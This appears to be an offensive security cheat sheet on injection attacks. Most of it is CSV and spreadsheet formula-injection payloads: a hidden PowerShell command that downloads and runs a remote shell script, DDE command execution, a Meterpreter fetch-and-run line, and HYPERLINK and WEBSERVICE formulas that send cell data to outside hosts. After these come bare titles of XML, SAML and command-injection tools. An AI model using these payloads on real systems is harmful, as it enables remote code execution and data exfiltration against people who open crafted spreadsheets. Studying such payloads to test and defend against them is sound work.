Link to this headingInjection

Link to this headingCSV Injection

Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution
Data Exfiltration via Formula Injection

Powershell payload:

=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://bishopfox.com/shell.ps1"); powershell -e $e'!A1
+cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0 -cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0 @cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0 =DDE(server; file; item; mode) =DDE("cmd";"/C calc";"__DdeLink_60_870516294")

Check Web Responses:

=WEBSERVICE(http://bishopfox.com =WEBSERVICE(https://bishopfox.com) =WEBSERVICE(http://dnstest.bishopfox.com) =HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")

Link to this headingNewline character

%0A-3+3+cmd|' /C calc'!D2

Link to this headingMeterpreter Shell

=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0

Link to this headingXML Injection

Aid blind XPath injection vulnerabilities
Vulnerable Java web application
XML Schema, DTD, and Entity Attacks
Tool that implements the Golden SAML attack
A New Era of SSRF Exploiting URL Parser in Trending Programming Languages!
Use WSDL files to send SOAP Messages
Java RMI enumeration and attack tool

Link to this headingCommand Injection

Command Injection Exploiter

Link to this headingUnicode

ZERO WIDTH SPACE